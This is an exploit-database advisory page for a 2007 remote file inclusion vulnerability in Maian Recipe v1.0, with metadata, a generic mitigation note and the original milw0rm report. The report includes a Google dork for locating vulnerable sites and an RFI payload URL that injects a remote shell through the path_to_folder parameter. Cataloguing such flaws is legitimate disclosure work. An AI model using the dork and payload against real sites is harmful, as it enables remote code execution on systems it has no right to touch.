header-logo
Suggest Exploit
vendor:
Maian Recipe
by:
Denven
5.5
CVSS
MEDIUM
Remote File Inclusion
98
CWE
Product Name: Maian Recipe
Affected Version From: Maian Recipe v1.0
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: a:maianscriptworld:maian_recipe:1.0
Metasploit:
Other Scripts:
Platforms Tested:
2007

Maian Recipe v1.0 Remote File Inclusion Vulnerability

The vulnerability is caused by the insecure inclusion of the file classes/class_mail.inc.php. An attacker can exploit this vulnerability to execute arbitrary PHP code by including a remote file.

Mitigation:

The vendor should update the software to a secure version that does not have this vulnerability. Users should also ensure that they are using the latest version of the software and apply any patches or updates provided by the vendor.
Source

Exploit-DB raw data:

*****************
Found by Denven *
*****************
*****************
*****************
Script: http://www.maianscriptworld.co.uk/freestuff_1975_recipe.html
*****************
Google Dork: "Powered by Maian Recipe v1.0"
*****************
ERROR:
classes/class_mail.inc.php :

include($path_to_folder.'classes/class.phpmailer.php');


****************************************************************************
**********
RFI:

http://www.SITE.com/path/classes/class_mail.inc.php?path_to_folder=[shell]

****************************************************************************
**********
denven[at]gmail[dot]com

# milw0rm.com [2007-02-07]

Navigation

Suggest Exploit

Services By CQR